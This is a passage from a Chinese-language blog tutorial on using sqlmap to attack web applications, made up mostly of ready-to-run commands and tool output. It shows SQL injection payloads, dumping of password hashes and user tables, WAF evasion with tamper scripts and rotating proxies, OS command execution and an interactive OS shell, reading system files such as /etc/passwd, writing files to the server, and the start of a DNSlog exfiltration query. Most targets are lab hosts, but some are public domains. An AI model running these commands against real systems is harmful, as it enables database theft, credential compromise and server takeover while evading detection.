Server\/Sybase AND error-based - WHERE or HAVING clause\nPayload: id=1 AND 4847=CONVERT(INT,(CHAR(58) CHAR(118) CHAR(114) CHAR(100) CHAR(58) (SELECT (CASE WHEN\n(4847=4847) THEN CHAR(49) ELSE CHAR(48) END)) CHAR(58) CHAR(111) CHAR(109) CHAR(113) CHAR(58)))\nType: UNION query\nTitle: Generic UNION query (NULL) - 3 columns\nPayload: id=1 UNION ALL SELECT NULL,NULL,CHAR(58) CHAR(118) CHAR(114) CHAR(100) CHAR(58) CHAR(70) CHAR(79)\nCHAR(118) CHAR(106) CHAR(87) CHAR(101) CHAR(119) CHAR(115) CHAR(114) CHAR(77) CHAR(58) CHAR(111) CHAR(109)\nCHAR(113) CHAR(58)--\nType: stacked queries\nTitle: Microsoft SQL Server\/Sybase stacked queries\nPayload: id=1; WAITFOR DELAY '0:0:5'--\nType: AND\/OR time-based blind\nTitle: Microsoft SQL Server\/Sybase 
time-based blind\nPayload: id=1 WAITFOR DELAY '0:0:5'--\nType: inline query\nTitle: Microsoft SQL Server\/Sybase inline queries\nPayload: id=(SELECT CHAR(58) CHAR(118) CHAR(114) CHAR(100) CHAR(58) (SELECT (CASE WHEN (6382=6382) THEN\nCHAR(49) ELSE CHAR(48) END)) CHAR(58) CHAR(111) CHAR(109) CHAR(113) CHAR(58))\n---\nweb server operating system: Windows XP\nweb application technology: ASP, Microsoft IIS 5.1\nback-end DBMS operating system: Windows XP Service Pack 2\nback-end DBMS: Microsoft SQL Server 2005\nbanner:\n---\nMicrosoft SQL Server 2005 - 9.00.1399.06 (Intel X86)\nOct 14 2005 00:33:37\nCopyright (c) 1988-2005 Microsoft Corporation\nExpress Edition on Windows NT 5.1 (Build 2600: Service Pack 2)\n---\ncurrent user: 'sa'\ncurrent database: 'testdb'\ncurrent user is DBA: True\n[*] shutting down at 11:25:52<\/code><\/pre>\n<h1>SQLMAP\u5b9e\u6218\u4e00<\/h1>\n<h2>\u68c0\u6d4b\u6ce8\u5165<\/h2>\n<p>\u68c0\u6d4bURL GET\u53c2\u6570\u7684\u662f\u5426\u5b58\u5728\u6ce8\u5165<\/p>\n<p>-u \u68c0\u6d4b\u7684url<\/p>\n<p>&quot;&quot;\u53cc\u5f15\u53f7 \u8868\u793a\u8fd9\u662f\u4e00\u6bb5\u5b57\u7b26\u4e32<\/p>\n<p>&#8211;dbms \u6307\u5b9a\u653b\u51fb\u7684\u6570\u636e\u5f15\u64ce<\/p>\n<p>-v \u8f93\u51fa\u4fe1\u606f\u767b\u8bb0\u4e3a1<\/p>\n<p><code>sqlmap -u \"http:\/\/192.168.0.103\/06\/vul\/sqli\/sqli_str.php?name=1&amp;submit=%E6%9F%A5%E8%AF%A2\" --dbms mysql -v 1<\/code><\/p>\n<p>\u8f93\u5165\u4e4b\u540esqlmap\u4f1a\u81ea\u52a8\u8fdb\u884c\u6ce8\u5165\uff0c\u4f46\u662f\u4f1a\u6709\u4e00\u4e9b\u8fdb\u884c\u63d0\u793a \u9700\u8981\u4f60\u5728\u7ec8\u7aef\u8fdb\u884c\u786e\u8ba4 \u5982\u679c\u4f7f\u7528&#8211;batch \u4f1a\u81ea\u52a8\u8fdb\u884c\u9ed8\u8ba4\u64cd\u4f5c\uff0c\u4e0d\u7528\u8fdb\u884c\u4ea4\u4e92\u4fe1\u606f\u786e\u5b9a<\/p>\n<p><code>sqlmap -u \"http:\/\/192.168.0.103\/06\/vul\/sqli\/sqli_str.php?name=1&amp;submit=%E6%9F%A5%E8%AF%A2\" --dbms mysql -v 1 
--batch<\/code><\/p>\n<p>\u7a0b\u5e8f\u4f1a\u81ea\u52a8\u786e\u8ba4\u8fdb\u884cSQL\u6ce8\u5165\u68c0\u6d4b\uff0c\u770b\u5230\u5b58\u5728\u6ce8\u5165\u7684\u53c2\u6570\u548c\u653b\u51fbpayload \u4e5f\u4f1a\u663e\u793a\u6ce8\u5165\u7684\u7c7b\u578b<\/p>\n<p>time-based blind \u65f6\u95f4\u76f2\u6ce8\u5165<\/p>\n<p>UNION query \u8054\u5408\u6ce8\u5165<\/p>\n<h2>\u83b7\u53d6\u654f\u611f\u4fe1\u606f<\/h2>\n<p>\u786e\u5b9a\u5b58\u5728\u6ce8\u5165\u4e4b\u540e \u63a5\u7740\u901a\u8fc7\u83b7\u53d6\u654f\u611f\u4fe1\u606f\u547d\u4ee4 \u83b7\u53d6<\/p>\n<p>&#8211;current-user \u7528\u6237\u8fde\u63a5\u7684\u7528\u6237<\/p>\n<p>&#8211;currnet-db \u5f53\u524d\u5e93<\/p>\n<p>&#8211;is-dba \u662f\u5426root\u6743\u9650<\/p>\n<p>&#8211;passwords \u83b7\u53d6\u6570\u636e\u5e93\u7684\u5bc6\u7801 \u4f7f\u7528\u8fd9\u4e2a\u547d\u4ee4 sqlmap\u627e\u5230\u5bc6\u6587\u65f6\uff0c\u4f1a\u63d0\u793a\u4f60\u662f\u5426\u8fdb\u884chash\u7834\u89e3 \u5982\u679c\u9700\u8981\u9009\u62e9\u5408\u9002\u7684\u5b57\u5178<\/p>\n<p><code>sqlmap -u \"http:\/\/192.168.0.103\/06\/vul\/sqli\/sqli_str.php?name=1&amp;submit=%E6%9F%A5%E8%AF%A2\" --dbms mysql --current-user --current-db --is-dba --passwords -v 1<\/code><\/p>\n<h2>\u83b7\u53d6\u6240\u6709\u5e93<\/h2>\n<p><code>sqlmap -u \"http:\/\/192.168.0.165\/06\/vul\/sqli\/sqli_str.php?name=1&amp;submit=%E6%9F%A5%E8%AF%A2\" -v 1 --dbms mysql --batch --dbs<\/code><\/p>\n<h2>\u83b7\u53d6\u8868<\/h2>\n<p>\u5728\u83b7\u53d6\u5f53\u524d\u5e93\u3001\u53ef\u4ee5\u6839\u636e\u5e93\u5217\u51fa\u8868\u3002<\/p>\n<p>-D \u6307\u5b9a\u5e93<\/p>\n<p>&#8211;tables \u5217\u51fa\u6240\u6709\u8868<\/p>\n<p><code>sqlmap -u \"http:\/\/192.168.0.103\/06\/vul\/sqli\/sqli_str.php?name=1&amp;submit=%E6%9F%A5%E8%AF%A2\" --dbms mysql -v 1 -D pikachu --tables<\/code><\/p>\n<h2>\u83b7\u53d6\u8868\u7684\u5b57\u6bb5<\/h2>\n<p>\u83b7\u53d6\u67d0\u4e2a\u8868\u7684\u6240\u6709\u5b57\u6bb5<\/p>\n<p>-T \u6307\u5b9a\u67d0\u4e2a\u8868<\/p>\n<p>&#8211;columns 
\u83b7\u53d6\u5b57\u6bb5<\/p>\n<p><code>sqlmap -u \"http:\/\/192.168.0.103\/06\/vul\/sqli\/sqli_str.php?name=1&amp;submit=%E6%9F%A5%E8%AF%A2\" --dbms mysql -v 1 -D pikachu -T users --columns<\/code><\/p>\n<p>\u83b7\u53d6\u67d0\u4e2a\u5e93\u7684\u6240\u6709\u8868\u7684\u6240\u6709\u5b57\u6bb5<\/p>\n<p><code>sqlmap -u \"http:\/\/192.168.0.103\/06\/vul\/sqli\/sqli_str.php?name=1&amp;submit=%E6%9F%A5%E8%AF%A2\" --dbms mysql -v 1 -D pikachu -tables --columns<\/code><\/p>\n<h2>\u83b7\u53d6\u6570\u636e<\/h2>\n<p>&#8211;dump \u662f\u5bfc\u51fa\u6570\u636e\u6240\u6709\u5185\u5bb9<\/p>\n<p>&#8211;dump -C &quot;username,password&quot; \u83b7\u53d6\u5b57\u6bb5\u7684\u5185\u5bb9<\/p>\n<p>\u83b7\u53d6\u6307\u5b9a\u5e93\u6240\u6709\u8868 \u6240\u6709\u5b57\u6bb5\u5185\u5bb9<\/p>\n<p><code>sqlmap -u \"http:\/\/192.168.0.103\/06\/vul\/sqli\/sqli_str.php?name=1&amp;submit=%E6%9F%A5%E8%AF%A2\" --dbms mysql -v 1 -D pikachu -tables --columns --dump<\/code><\/p>\n<p>\u83b7\u53d6\u6307\u5b9a\u8868\u7684 \u6240\u6709\u5b57\u6bb5\u5185\u5bb9<\/p>\n<p><code>sqlmap -u \"http:\/\/192.168.0.103\/06\/vul\/sqli\/sqli_str.php?name=1&amp;submit=%E6%9F%A5%E8%AF%A2\" --dbms mysql -v 1 -D pikachu -T users --columns --dump<\/code><\/p>\n<p>\u83b7\u53d6\u6307\u5b9a \u8868 \u6307\u5b9a\u5b57\u6bb5\u5185\u5bb9<\/p>\n<p><code>sqlmap -u \"http:\/\/192.168.0.103\/06\/vul\/sqli\/sqli_str.php?name=1&amp;submit=%E6%9F%A5%E8%AF%A2\" --dbms mysql -v 1 -D pikachu -T users -C \"id,username,password\" --dump<\/code><\/p>\n<h2>\u83b7\u53d6\u6307\u5b9a\u6761\u6570<\/h2>\n<p>\u83b7\u53d6\u603b\u6761\u6570<\/p>\n<p><code>sqlmap -u \"http:\/\/192.168.0.103\/06\/vul\/sqli\/sqli_str.php?name=1&amp;submit=%E6%9F%A5%E8%AF%A2\" --dbms mysql -v 1 -D pikachu -T users --count<\/code><\/p>\n<p>\u83b7\u53d6\u6307\u5b9aid\u6761\u6570<\/p>\n<p><code>sqlmap -u \"http:\/\/192.168.0.103\/06\/vul\/sqli\/sqli_str.php?name=1&amp;submit=%E6%9F%A5%E8%AF%A2\" --dbms mysql -v 1 -D pikachu -T users --dump --start 1 --stop 
3<\/code><\/p>\n<h2>\u5220\u9664\u7f13\u5b58\u6587\u4ef6<\/h2>\n<p>\u53c2\u6570\uff1a&#8211;flush-session<\/p>\n<p>\u5982\u679c\u4e0d\u60f3\u7528\u4e4b\u524d\u7f13\u5b58\u8fd9\u4e2a\u76ee\u6807\u7684session\u6587\u4ef6\uff0c\u53ef\u4ee5\u4f7f\u7528\u8fd9\u4e2a\u53c2\u6570\u3002 \u4f1a\u6e05\u7a7a\u4e4b\u524d\u7684session\uff0c\u91cd\u65b0\u6d4b\u8bd5\u8be5\u76ee\u6807<\/p>\n<h2>\u5b89\u5168\u7684\u5220\u9664output\u76ee\u5f55\u7684\u6587\u4ef6<\/h2>\n<p>\u53c2\u6570\uff1a&#8211;purge-output<\/p>\n<p>\u6709\u65f6\u9700\u8981\u5220\u9664\u7ed3\u679c\u6587\u4ef6\uff0c\u800c\u4e0d\u88ab\u6062\u590d\uff0c\u53ef\u4ee5\u4f7f\u7528\u6b64\u53c2\u6570\uff0c\u539f\u6709\u6587\u4ef6\u5c06\u4f1a\u88ab\u968f\u673a\u7684\u4e00\u4e9b\u6587\u4ef6\u8986\u76d6\u3002<\/p>\n<h1>SQLMAP\u5b9e\u6218\u4e8c<\/h1>\n<h2>&#8211;technique \u4f7f\u7528\u6307\u5b9a\u7684\u6ce8\u5165\u65b9\u5f0f<\/h2>\n<p>\u5728\u4e00\u4e9b\u5b9e\u6218\u9879\u76ee\u4e2d\uff0c\u96be\u514d\u4f1a\u9047\u4e0a \u7f51\u7edc\u53cd\u5e94\u7f13\u6162\uff0cidc\u8fd8\u6709\u68c0\u6d4bsqlmap\u7684\u80fd\u529b\uff0c\u6240\u4ee5\u4f5c\u4e3a\u4e00\u4e2a\u4e13\u4e1a\u7684\u6e17\u900f\u6d4b\u8bd5\u4eba\u5458\uff0c\u5fc5\u987b\u505a\u5230\u5feb\u51c6\u72e0\u3002<\/p>\n<p>\u6709\u4e9bSQL\u6ce8\u5165\u70b9 \u53ea\u5141\u8bb8\u65f6\u95f4\u6ce8\u5165\uff0c\u8fd9\u65f6\u6307\u5b9aSQLMAP\u7684\u6ce8\u5165\u7c7b\u578b\u4e3aT<\/p>\n<p>\u4ee5\u4e0b\u662f&#8211;technique 
\u53c2\u6570\u7684\u503c\u7684\u89e3\u91ca<\/p>\n<blockquote>\n<p>B:Boolean-basedblindSQLinjection\uff08\u5e03\u5c14\u578b\u6ce8\u5165\uff09<\/p>\n<p>E:Error-basedSQLinjection\uff08\u62a5\u9519\u578b\u6ce8\u5165\uff09<\/p>\n<p>U:UNIONquerySQLinjection\uff08\u53ef\u8054\u5408\u67e5\u8be2\u6ce8\u5165\uff09<\/p>\n<p>S:StackedqueriesSQLinjection\uff08\u53ef\u591a\u8bed\u53e5\u67e5\u8be2\u6ce8\u5165\uff09<\/p>\n<p>T:Time-basedblindSQLinjection\uff08\u57fa\u4e8e\u65f6\u95f4\u5ef6\u8fdf\u6ce8\u5165\uff09<\/p>\n<p>Q:InlineSQLInjection(\u5185\u8054\u6ce8\u5165)<\/p>\n<\/blockquote>\n<h2>\u4f7f\u7528\u57fa\u4e8e\u65f6\u95f4\u7684\u5ef6\u65f6\u6ce8\u5165<\/h2>\n<p><code>sqlmap -u \"http:\/\/192.168.0.103\/06\/vul\/sqli\/sqli_str.php?name=1&amp;submit=%E6%9F%A5%E8%AF%A2\" --dbms mysql -v 3 -D pikachu --technique=T<\/code><\/p>\n<p>\u652f\u6301\u591a\u79cd\u6ce8\u5165\u68c0\u6d4b \u9ed8\u8ba4\u662f\u5168\u90e8<\/p>\n<p><code>sqlmap -u \"http:\/\/192.168.0.103\/06\/vul\/sqli\/sqli_str.php?name=1&amp;submit=%E6%9F%A5%E8%AF%A2\" --dbms mysql -v 3 -D pikachu --technique=BEUT<\/code><\/p>\n<h2>\u6ce8\u5165\u65f6\u4f7f\u7528\u968f\u673a\u7684 HTTP User-Agent<\/h2>\n<p><code>sqlmap -u \"http:\/\/192.168.0.103\/06\/vul\/sqli\/sqli_str.php?name=1&amp;submit=%E6%9F%A5%E8%AF%A2\" --dbms mysql -v 3 -D --random-agent<\/code><\/p>\n<h2>\u8bbe\u7f6e\u8d85\u65f6\u65f6\u95f4<\/h2>\n<p>&#8211;time-out \u8fd9\u4e2a\u53c2\u6570\u662f\u8bbe\u7f6e\u8d85\u65f6\u65f6\u95f4 \u6709\u5f97\u7f51\u9875\u54cd\u5e94\u6bd4\u8f83\u6162\uff0c\u53ef\u4ee5\u4f7f\u7528\u8fd9\u4e2a\u53c2\u6570\u6765\u589e\u5927\u8bbf\u95ee\u8d85\u65f6\u7684\u65f6\u95f4\u3002\u9ed8\u8ba4\u662f30<\/p>\n<p><code>sqlmap -u \"http:\/\/192.168.0.103\/06\/vul\/sqli\/sqli_str.php?name=1&amp;submit=%E6%9F%A5%E8%AF%A2\" --dbms mysql -v 3 -D pikachu --timeout=10<\/code><\/p>\n<h2>\u8bfb\u53d6\u6587\u672c\u8fdb\u884cSQL\u6ce8\u5165\u68c0\u6d4b<\/h2>\n<p>sqlmap -r post.txt<\/p>\n<p>sqlmap -r post.txt &#8211;batch<\/p>\n<pre class=\"prettyprint 
linenums\" ><code class=\"language-html\">POST \/06\/vul\/sqli\/sqli_id.php HTTP\/1.1\nHost: 192.168.0.103\nUser-Agent: Mozilla\/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko\/20100101 Firefox\/89.0\nAccept: text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/webp,*\/*;q=0.8\nAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2\nAccept-Encoding: gzip, deflate\nContent-Type: application\/x-www-form-urlencoded\nContent-Length: 30\nOrigin: http:\/\/192.168.0.103\nConnection: close\nReferer: http:\/\/192.168.0.103\/06\/vul\/sqli\/sqli_id.php\nCookie: PHPSESSID=d2tc9ru7f1qdi44dvt8ecd2c95\nUpgrade-Insecure-Requests: 1\nid=1&amp;submit=%E6%9F%A5%E8%AF%A2<\/code><\/pre>\n<h2>\u6307\u5b9a\u53c2\u6570\u8fdb\u884c\u6ce8\u5165<\/h2>\n<p>-p \u6307\u5b9a\u9700\u8981\u6d4b\u8bd5\u7684\u53c2\u6570<\/p>\n<p><code>sqlmap -u \"http:\/\/192.168.0.103\/06\/vul\/sqli\/sqli_str.php?name=1&amp;submit=%E6%9F%A5%E8%AF%A2\" -p name --dbmsmysql -v 1<\/code><\/p>\n<p>\u4f7f\u7528*\u8fdb\u884c\u6ce8\u5165<\/p>\n<p>\u5982\u679curl\u662f\u4f2a\u9759\u6001\u7684\u65f6 \uff0c\u53ef\u4ee5\u4f7f\u7528*\u53f7\u8868\u793a\u8fd9\u662f\u68c0\u6d4b\u7684\u5730\u65b9<\/p>\n<p>sqlmap -u &quot;<a href=\"http:\/\/192.168.0.103\/06\/vul\/sqli\/id\/1*.\/html\">http:\/\/192.168.0.103\/06\/vul\/sqli\/id\/1*.\/html<\/a><\/p>\n<p>POST\u6ce8\u5165<\/p>\n<p>sqlmap -u <a href=\"http:\/\/192.168.0.103\/06\/vul\/sqli\/sqli_id.php\">http:\/\/192.168.0.103\/06\/vul\/sqli\/sqli_id.php<\/a> &#8211;data &quot;id=1&amp;submit=%E6%9F%A5%E8%AF%A2&quot; -p id -v 1<\/p>\n<p>cookie\u6ce8\u5165<\/p>\n<p>&#8211;cookie \u8f93\u5165cookie\u7684\u8bf7\u6c42\u53c2\u6570<\/p>\n<p>&#8211;level 2\u6216\u8005\u4ee5\u4e0a\u624d\u8fdb\u884ccookie\u6ce8\u5165<\/p>\n<p><code>sqlmap.py -u \"http:\/\/192.168.87.129\/shownews.asp\" --cookie \"id=27\" --dump -T admin -C \"user,password\" --level 
2<\/code><\/p>\n<h1>SQLMAP\u5b9e\u6218\u4e09<\/h1>\n<h2>\u4fee\u6539\u9ed8\u8ba4\u6700\u5927\u7ebf\u7a0b<\/h2>\n<p>lib\/core\/settings.py<\/p>\n<p>\u9ed8\u8ba4\u6700\u5927\u7ebf\u7a0b\u662f10 \u53ef\u4ee5\u8bbe\u7f6e\u7ebf\u7a0b\u6700\u5927\u4e3a100<\/p>\n<p><code>MAX_NUMBER_OF_THREADS = 100<\/code><\/p>\n<h2>\u4fee\u6539\u9ed8\u8ba4\u7684\u6d4f\u89c8\u5668<\/h2>\n<p><code>agent = Mozilla\/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko\/20100101 Firefox\/16.0<\/code><\/p>\n<p>\u4f7f\u7528\u914d\u7f6e\u6587\u4ef6\u68c0\u6d4b<\/p>\n<p><code>python sqlmap.py -C sqlmap.conf -u \"http:\/\/www.baidu.com\/moonsec.php?id=1\"<\/code><\/p>\n<p>sqlmap\u4f7f\u7528<\/p>\n<h1>SQLMAP\u7ed5\u8fc7\u9632\u706b\u5899\u62e6\u622a<\/h1>\n<p>\u76ee\u524d\u5f88\u591a\u7f51\u7ad9\u90fd\u4f7f\u7528waf\u5bf9\u7f51\u7ad9\u8fdb\u884c\u4fdd\u62a4\uff0c\u5728\u6e17\u900f\u6d4b\u8bd5\u8fc7\u7a0b\u4e2d\uff0c\u5f88\u591a\u7684\u64cd\u4f5c\u90fd\u4f1a\u88ab\u62e6\u622a\uff0c\u5728\u6d4b\u8bd5SQL\u6ce8\u5165\u65f6\uff0cwaf\u4f1a\u5bf9\u8bf7\u6c42\u8fc7\u6765\u7684\u6d41\u91cf\u8fdb\u884c\u62e6\u622a\uff0c\u5bfc\u81f4SQLMAP\u8bf7\u6c42\u7684\u5185\u5bb9\u65e0\u6cd5\u5230\u8fbe\u76ee\u6807\uff0cSQLMAP\u65e0\u6cd5\u5224\u65ad\u76ee\u6807\u662f\u5426\u5b58\u5728\u6ce8\u5165\uff0cwaf\u5bf9\u6076\u610f\u7684\u653b\u51fb\u8bf7\u6c42\u8fdb\u884c\u62e6\u622a\uff0c\u62e6\u622a\u4f1a\u62c9\u5165\u9ed1\u540d\u5355\uff0c\u5bfc\u81f4\u653b\u51fb\u8005\u8bbf\u95ee\u4e0d\u5230\u76ee\u6807\u3002\u65e0\u6cd5\u8fdb\u884c\u5b89\u5168\u68c0\u6d4b\u3002<\/p>\n<p>sqlmap\u4f7f\u7528&#8211;tamper\u547d\u4ee4 \u9009\u62e9\u5408\u9002\u7684\u811a\u672c\u5bf9waf\u8fdb\u884c\u7ed5\u8fc7<\/p>\n<p><code>sqlmap.py -u \"http:\/\/192.168.0.103\/06\/vul\/sqli\/sqli_str.php?name=1&amp;submit=%E6%9F%A5%E8%AF%A2\" -p name --dbmsmysql --tamper \"space2comment\" -v 3 --dbs<\/code><\/p>\n<h2>\u5bbd\u5b57\u8282\u6ce8\u5165<\/h2>\n<p>unmagicquotes.py<\/p>\n<p><code>sqlmap -u \"http:\/\/192.168.0.136:7766\/Less-32\/?id=1\" --dbms mysql --tamper 
\"unmagicquotes.py\" -v 4<\/code><\/p>\n<p>base64\u6ce8\u5165<\/p>\n<p><code>sqlmap -u \"http:\/\/192.168.0.136:7766\/Less-21\/index.php\" --cookie=\"uname=YWRtaW4%3D;PHPSESSID=0roc9e02hrro7nefi1jiuvukq5\" --param-del=\";\" --dbms mysql --tamper \"base64encode.py\" -v 4 --level 3<\/code><\/p>\n<pre class=\"prettyprint linenums\" ><code class=\"language-html\">GET \/Less-21\/index.php HTTP\/1.1\nHost: 192.168.0.136:7766\nUser-Agent: Mozilla\/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko\/20100101 Firefox\/89.0\nAccept: text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/webp,*\/*;q=0.8\nAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2\nAccept-Encoding: gzip, deflate\nReferer: http:\/\/192.168.0.136:7766\/Less-21\/?id=1\nConnection: close\nCookie: uname=YWRtaW4%3D; PHPSESSID=0roc9e02hrro7nefi1jiuvukq5\nUpgrade-Insecure-Requests: 1\nCache-Control: max-age=0<\/code><\/pre>\n<p><code>sqlmap -u \"http:\/\/192.168.0.136:7766\/Less-21\/index.php\" --cookie=\"uname=YWRtaW4%3D;PHPSESSID=0roc9e02hrro7nefi1jiuvukq5\" --dbms mysql --tamper \"base64encode.py\" -v 1 --level 3<\/code><\/p>\n<p>&#8211;param-del=&quot;;&quot; \u7528;\u5206\u5272\u53c2\u6570<\/p>\n<p><code>sqlmap -u \"http:\/\/192.168.0.136:7766\/Less-21\/index.php\" --cookie=\"uname=YWRtaW4%3D;PHPSESSID=0roc9e02hrro7nefi1jiuvukq5\" --param-del=\";\" --dbms mysql --tamper \"base64encode.py\" -v 4 --level 3<\/code><\/p>\n<h2>tampter\u6a21\u5757\u5217\u8868<\/h2>\n<p>sqlmap &#8211;list-tampers<\/p>\n<p><img loading="lazy" decoding="async" decoding=\"async\"  src=\"https:\/\/www.youvii.site\/wp-content\/themes\/lolimeow-lolimeowV13.13\/assets\/images\/loading.gif\" data-src=\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae3896d8e3.png\" class=\"lazy\" loading=\"lazy\" alt=\"1746432568644-9b602ae4-6f45-483a-91c5-4a7b8196d159.png\" \/><\/p>\n<p><img loading="lazy" decoding="async" decoding=\"async\"  
src=\"https:\/\/www.youvii.site\/wp-content\/themes\/lolimeow-lolimeowV13.13\/assets\/images\/loading.gif\" data-src=\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae38d66556.png\" class=\"lazy\" loading=\"lazy\" alt=\"1746432585919-54666ac4-8e7d-4bab-9b90-1efa95797956.png\" \/><\/p>\n<p><img loading="lazy" decoding="async" decoding=\"async\"  src=\"https:\/\/www.youvii.site\/wp-content\/themes\/lolimeow-lolimeowV13.13\/assets\/images\/loading.gif\" data-src=\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae39021cf9.png\" class=\"lazy\" loading=\"lazy\" alt=\"1746432595364-49ea7fa9-d0e1-4b60-815e-f3c097b13ab4.png\" \/><\/p>\n<h2>\u8bbe\u7f6e\u7ebf\u7a0b\u5927\u5c0f<\/h2>\n<p>\u5728\u9047\u5230waf\u7684\u65f6\u5019\uff0c\u5982\u679c\u5e76\u53d1\u8fc7\u5927\uff0c\u4f1a\u8ba4\u4e3a\u662fcc\u653b\u51fb\uff0cip\u4f1a\u88ab\u5c01\u5835<\/p>\n<p>&#8211;threads=1 \u8bbe\u7f6e\u7ebf\u7a0b\u4e3a1<\/p>\n<h2>\u8bbe\u7f6ehttp\u8bf7\u6c42\u5ef6\u65f6<\/h2>\n<p>&#8211;delay=DELAY \u8bbe\u7f6e\u6bcf\u4e2a HTTP \u8bf7\u6c42\u7684\u5ef6\u8fdf\u79d2\u6570<\/p>\n<h2>\u4f7f\u7528\u4ee3\u7406\u6ce8\u5165<\/h2>\n<p><code>sqlmap -u \"http:\/\/192.168.0.103\/06\/vul\/sqli\/sqli_str.php?name=1&amp;submit=%E6%9F%A5%E8%AF%A2\" -p name --dbmsmysql -v 1 --proxy=http:\/\/123.73.63.6:46603<\/code><\/p>\n<h2>\u4f7f\u7528\u4ee3\u7406\u6c60\u6ce8\u5165<\/h2>\n<p>\u8d2d\u4e70\u4ee3\u7406\u6c60\u4e4b\u540e \u83b7\u53d6\u4ee3\u7406 \u4fdd\u5b58\u5230\u6587\u4ef6\u5185<\/p>\n<details class=\"lake-collapse\">\n<summary id=\"u68da0c24\"><span class=\"ne-text\">proxy.txt<\/span><\/summary>\n<p id=\"uda2f54e5\" class=\"ne-p\"><span class=\"ne-text\">123.73.208.166:46603<\/span><\/p>\n<p id=\"u4cc4f1e8\" class=\"ne-p\"><span class=\"ne-text\">123.73.63.29:46603<\/span><\/p>\n<p id=\"u4596be10\" class=\"ne-p\"><span class=\"ne-text\">123.73.63.84:46603<\/span><\/p>\n<p id=\"u9fca5253\" class=\"ne-p\"><span class=\"ne-text\">112.123.40.42:40806<\/span><\/p>\n<p id=\"ucbf4d256\" class=\"ne-p\"><span 
class=\"ne-text\">183.47.94.248:38090<\/span><\/p>\n<p id=\"u23a4de24\" class=\"ne-p\"><span class=\"ne-text\">121.237.149.88:13804<\/span><\/p>\n<p id=\"u9c52052d\" class=\"ne-p\"><span class=\"ne-text\">114.99.108.71:23359<\/span><\/p>\n<p id=\"u08c86fb2\" class=\"ne-p\"><span class=\"ne-text\">123.73.209.246:46603<\/span><\/p>\n<p id=\"u537c4cbe\" class=\"ne-p\"><span class=\"ne-text\">123.73.63.132:46603<\/span><\/p>\n<p id=\"u07cd7576\" class=\"ne-p\"><span class=\"ne-text\">119.55.253.202:39730<\/span><\/p>\n<\/details>\n<p>&#8211;proxy-file \u4ece\u6587\u4ef6\u4e2d\u52a0\u8f7d\u4ee3\u7406\u5217\u8868<\/p>\n<p><code>sqlmap -u \"http:\/\/192.168.0.136:7766\/Less-32\/?id=1\" --dbms mysql --tamper \"unmagicquotes.py\" -v 1 --proxy-file=proxy.txt<\/code><\/p>\n<h1>SQLMAP\u547d\u4ee4\u6267\u884c \u6587\u4ef6\u8bfb\u5199 dns\u76f2\u6ce8<\/h1>\n<h2>sqlmap\u547d\u4ee4\u6267\u884c<\/h2>\n<p>&#8211;os-cmd=OSCMD \u6267\u884c\u64cd\u4f5c\u7cfb\u7edf\u547d\u4ee4<\/p>\n<p>&#8211;os-shell \u8c03\u51fa\u4ea4\u4e92\u5f0f\u64cd\u4f5c\u7cfb\u7edf shell<\/p>\n<p>\u6ce8\u5165\u70b9\u7684\u5f53\u524d\u7528\u6237\u662fdba\u65f6\uff0c\u4f7f\u7528\u4ee5\u4e0a\u4e24\u4e2a\u547d\u4ee4\uff0c\u4e00\u4e2a\u662f\u6267\u884c\u547d\u4ee4\uff0c\u4e00\u4e2a\u662f\u8c03\u7528\u4ea4\u4e92\u64cd\u4f5c\u7cfb\u7edfshell<\/p>\n<p>sqlmap -u &quot;<a href=\"http:\/\/www.dm1.com\/inj.aspx?id=1\">http:\/\/www.dm1.com\/inj.aspx?id=1<\/a>&quot; -v 1 &#8211;os-cmd=&quot;net user&quot;<\/p>\n<p>sqlmap -u &quot;<a href=\"http:\/\/www.dm1.com\/inj.aspx?id=1\">http:\/\/www.dm1.com\/inj.aspx?id=1<\/a>&quot; -v 1 &#8211;os-shell<\/p>\n<p>\u4f7f\u7528&#8211;os-shell\u547d\u4ee4\u4f1a\u5f39\u51fa\u4e00\u4e2a\u4ea4\u4e92shell\u7684\u754c\u9762 \u53ef\u4ee5\u5728\u5176\u8f93\u5165\u547d\u4ee4\uff0c\u5982\u679c\u53ef\u4ee5\u56de\u663e\u5c31\u4f1a\u8fd4\u56de\u547d\u4ee4\u6267\u884c\u7684\u4fe1\u606f<\/p>\n<h2>\u8bfb\u53d6\u548c\u5199\u5165\u6587\u4ef6<\/h2>\n<p>&#8211;file-read \u8bfb\u53d6\u6587\u4ef6 
\u8bfb\u53d6\u6587\u4ef6\u9996\u5148\u8981\u77e5\u9053\u8def\u5f84,\u624d\u80fd\u8bfb\u53d6<\/p>\n<p><code>sqlmap -u \"http:\/\/www.dm1.com\/inj.aspx?id=1\" -v 1 --file-read=\"C:\/Windows\/System32\/inetsrv\/MetaBase.xml\" --threads=10<\/code><\/p>\n<p>C:\/Windows\/System32\/inetsrv\/MetaBase.xml \u53ef\u4ee5\u6362\u6210\u5176\u4ed6\u6587\u4ef6\u8def\u5f84 \u5982\u679c\u662flinux \u53ef\u4ee5\u8bfb\u53d6\/etc\/passwd<\/p>\n<p>&#8211;file-write \u5199\u5165\u6587\u4ef6<\/p>\n<p>&#8211;file-write \u76ee\u6807\u8def\u5f84 &#8211;file-dest \u6587\u4ef6\u8def\u5f84<\/p>\n<p><code>sqlmap -u \"http:\/\/www.dm1.com\/inj.aspx?id=1\" -v 1 --file-write D:1.txt --file-dest C:Hws.comHwsHostMasterwwwrootdm1.comweb1.txt<\/code><\/p>\n<h2>sqlmap dnslog\u6ce8\u5165<\/h2>\n<p>\u8fd9\u79cd\u60c5\u51b5\u9002\u5408\u4f7f\u7528\u6ca1\u6709\u56de\u663e\u7684\u65f6\uff0c\u4f7f\u7528\u6ce8\u5165\u628a\u6570\u636e\u53d1\u9001\u5230\u8fdc\u7a0bdnslog\u4e0a\u3002<\/p>\n<p>&#8211;sql-shell \u8c03\u7528 sql\u4ea4\u4e92shell<\/p>\n<p><code>declare @s varchar(5000),@host varchar(5000) set @s=(host_name()) 